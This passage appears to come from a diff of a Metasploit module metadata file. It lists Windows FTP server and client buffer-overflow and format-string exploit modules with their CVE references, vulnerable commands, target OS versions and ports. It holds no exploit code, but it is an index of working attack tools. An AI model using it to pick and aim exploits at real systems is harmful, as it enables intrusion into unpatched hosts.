"/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/3cdaemon_ftp_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/aasync_list_reply": { + "name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)", + "fullname": "exploit/windows/ftp/aasync_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r " + ], + 
"description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.", + "references": [ + "OSVDB-68701", + "EDB-16738", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/aasync_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/aasync_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ability_server_stor": { + "name": "Ability Server 2.34 STOR Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ability_server_stor", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-10-22", + "type": "exploit", + "author": [ + "muts", + "Dark Eagle", + "Peter Osterberg" + ], + "description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. 
Other versions may also be affected.", + "references": [ + "CVE-2004-1626", + "OSVDB-11030", + "EDB-588" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows XP SP2 ENG", + "Windows XP SP3 ENG" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/ability_server_stor.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ability_server_stor", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/absolute_ftp_list_bof": { + "name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/absolute_ftp_list_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-09", + "type": "exploit", + "author": [ + "Node" + ], + "description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.", + "references": [ + "CVE-2011-5164", + "OSVDB-77105", + "EDB-18102" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/absolute_ftp_list_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ayukov_nftp": { + "name": "Ayukov NFTP FTP Client Buffer Overflow", + "fullname": "exploit/windows/ftp/ayukov_nftp", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-10-21", + "type": "exploit", + "author": [ + "Berk Cem Goksel", + "Daniel Teixeira", + "sinn3r " + ], + 
"description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.", + "references": [ + "CVE-2017-15222", + "EDB-43025" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ayukov_nftp.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ayukov_nftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/bison_ftp_bof": { + "name": "BisonWare BisonFTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/bison_ftp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-07", + "type": "exploit", + "author": [ + "localh0t", + "veerendragg ", + "Jay Turla" + ], + "description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.", + "references": [ + "CVE-1999-1510", + "BID-49109", + "EDB-17649", + "URL-http://secpod.org/msf/bison_server_bof.rb" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Bisonware FTP Server / Windows XP SP3 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/bison_ftp_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/ftp/cesarftp_mkd": { + "name": "Cesar FTP 0.99g MKD Command Buffer Overflow", + "fullname": "exploit/windows/ftp/cesarftp_mkd", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.", + "references": [ + "CVE-2006-2961", + "OSVDB-26364", + "BID-18586", + "URL-http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows 2000 Pro SP4 French", + "Windows XP SP2/SP3 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/cesarftp_mkd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/comsnd_ftpd_fmtstr": { + "name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability", + "fullname": "exploit/windows/ftp/comsnd_ftpd_fmtstr", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-06-08", + "type": "exploit", + "author": [ + "ChaoYi Huang ", + "rick2600 ", + "mr_me ", + "corelanc0d3r " + ], + "description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. 
Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.", + "references": [ + "OSVDB-82798", + "EDB-19024" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3 - English", + "Windows Server 2003 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb", + "is_install_path": true, + "ref_name": "windows/ftp/comsnd_ftpd_fmtstr", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/dreamftp_format": { + "name": "BolinTech Dream FTP Server 1.02 Format String", + "fullname": "exploit/windows/ftp/dreamftp_format", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-03-03", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. 
Based on the exploit by SkyLined.", + "references": [ + "CVE-2004-2074", + "OSVDB-4986", + "BID-9800", + "EDB-823" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Dream FTP Server v1.02 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/dreamftp_format.rb", + "is_install_path": true, + "ref_name": "windows/ftp/dreamftp_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyfilesharing_pass": { + "name": "Easy File Sharing FTP Server 2.0 PASS Overflow", + "fullname": "exploit/windows/ftp/easyfilesharing_pass", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.", + "references": [ + "CVE-2006-3952", + "OSVDB-27646", + "BID-19243" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyfilesharing_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_cwd_fixret": { + "name": "EasyFTP Server CWD Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_cwd_fixret", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-16", + "type": "exploit", + "author": [ + "Paul Makowski ", + "jduck " + ], + 
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", + "references": [ + "OSVDB-62134", + "BID-38262", + "URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/", + "URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit", + "URL-https://seclists.org/bugtraq/2010/Feb/202" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows Universal - v1.7.0.2", + "Windows Universal - v1.7.0.3", + "Windows Universal - v1.7.0.4", + "Windows Universal - v1.7.0.5", + "Windows Universal - v1.7.0.6", + "Windows Universal - v1.7.0.7", + "Windows Universal - v1.7.0.8", + "Windows Universal - v1.7.0.9", + "Windows Universal - v1.7.0.10", + "Windows Universal - v1.7.0.11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_cwd_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_list_fixret": { + "name": "EasyFTP Server LIST Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_list_fixret", + "aliases": [], + "rank": 500, + 
"disclosure_date": "2010-07-05", + "type": "exploit", + "author": [ + "Karn Ganeshan ", + "MFR", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.", + "references": [ + "OSVDB-62134", + "EDB-14400", + "EDB-14451" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 - Version 2002" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_list_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_mkd_fixret": { + "name": "EasyFTP Server MKD Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_mkd_fixret", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-04-04", + "type": "exploit", + "author": [ + "x90c ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. 
See references for more information.", + "references": [ + "OSVDB-62134", + "EDB-12044", + "EDB-14399" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows Universal - v1.7.0.2", + "Windows Universal - v1.7.0.3", + "Windows Universal - v1.7.0.4", + "Windows Universal - v1.7.0.5", + "Windows Universal - v1.7.0.6", + "Windows Universal - v1.7.0.7", + "Windows Universal - v1.7.0.8", + "Windows Universal - v1.7.0.9", + "Windows Universal - v1.7.0.10", + "Windows Universal - v1.7.0.11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_mkd_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/filecopa_list_overflow": { + "name": "FileCopa FTP Server Pre 18 Jul Version", + "fullname": "exploit/windows/ftp/filecopa_list_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-19", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch", + "references": [ + "CVE-2006-3726", + "OSVDB-27389", + "BID-19065" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2k Server SP4 English", + "Windows XP Pro SP2 Italian" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb", + "is_install_path": true, + "ref_name": "windows/ftp/filecopa_list_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
null + }, + "exploit_windows/ftp/filewrangler_list_reply": { + "name": "FileWrangler 5.30 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/filewrangler_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "nullthreat", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.", + "references": [ + "OSVDB-94555", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/filewrangler_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freefloatftp_user": { + "name": "Free Float FTP Server USER Command Buffer Overflow", + "fullname": "exploit/windows/ftp/freefloatftp_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "D35m0nd142", + "Doug Prostko " + ], + "description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. 
With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.", + "references": [ + "OSVDB-69621", + "EDB-23243" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "FreeFloat / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/freefloatftp_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freefloatftp_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freefloatftp_wbem": { + "name": "FreeFloat FTP Server Arbitrary File Upload", + "fullname": "exploit/windows/ftp/freefloatftp_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-07", + "type": "exploit", + "author": [ + "sinn3r ", + "juan vazquez " + ], + "description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. 
As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.", + "references": [ + "OSVDB-88302", + "OSVDB-88303" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "FreeFloat" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freefloatftp_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/ftp/freeftpd_pass": { + "name": "freeFTPd PASS Command Buffer Overflow", + "fullname": "exploit/windows/ftp/freeftpd_pass", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-08-20", + "type": "exploit", + "author": [ + "Wireghoul", + "TecR0c " + ], + "description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. 
This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.", + "references": [ + "OSVDB-96517", + "EDB-27747", + "BID-61905" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "freeFTPd 1.0.10 and below on Windows Desktop Version" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freeftpd_pass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freeftpd_user": { + "name": "freeFTPd 1.0 Username Overflow", + "fullname": "exploit/windows/ftp/freeftpd_user", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-11-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. 
This flaw can only be\n exploited when logging has been enabled (non-default).", + "references": [ + "CVE-2005-3683", + "OSVDB-20909", + "BID-15457" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows NT SP5/SP6a English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/freeftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freeftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpgetter_pwd_reply": { + "name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)", + "fullname": "exploit/windows/ftp/ftpgetter_pwd_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "ekse", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.", + "references": [ + "OSVDB-68638", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpgetter_pwd_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/ftp/ftppad_list_reply": { + "name": "FTPPad 1.2.0 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftppad_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r" + ], + "description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.", + "references": [ + "OSVDB-68714", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Professional, English - shlwapi 6.00.2900.5912", + "XP SP3 Professional, German - shlwapi 6.00.2900.5912", + "XP SP3 Professional, English - shlwapi 6.00.2900.5512" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftppad_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpshell51_pwd_reply": { + "name": "FTPShell 5.1 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpshell51_pwd_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. 
This will overwrite the saved EIP and structured exception handler.", + "references": [ + "OSVDB-68639", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpshell51_pwd_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpshell_cli_bof": { + "name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpshell_cli_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-04", + "type": "exploit", + "author": [ + "r4wd3r", + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.", + "references": [ + "CVE-2018-7573", + "EDB-44596" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpshell_cli_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpsynch_list_reply": { + "name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpsynch_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "myne-us", + "corelanc0d3r " + ], + "description": "This 
module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpsynch_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/gekkomgr_list_reply": { + "name": "Gekko Manager FTP Client Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/gekkomgr_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "nullthreat", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. 
If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.", + "references": [ + "OSVDB-68641", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/gekkomgr_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/globalscapeftp_input": { + "name": "GlobalSCAPE Secure FTP Server Input Overflow", + "fullname": "exploit/windows/ftp/globalscapeftp_input", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-05-01", + "type": "exploit", + "author": [ + "Fairuzan Roslan ", + "Mati Aharoni " + ], + "description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. 
A valid user account (\n or anonymous access) is required for this exploit to work.", + "references": [ + "CVE-2005-1415", + "OSVDB-16049", + "BID-13454", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb", + "is_install_path": true, + "ref_name": "windows/ftp/globalscapeftp_input", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/goldenftp_pass_bof": { + "name": "GoldenFTP PASS Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/goldenftp_pass_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-01-23", + "type": "exploit", + "author": [ + "Craig Freyman", + "bannedit ", + "Joff Thyer " + ], + "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. 
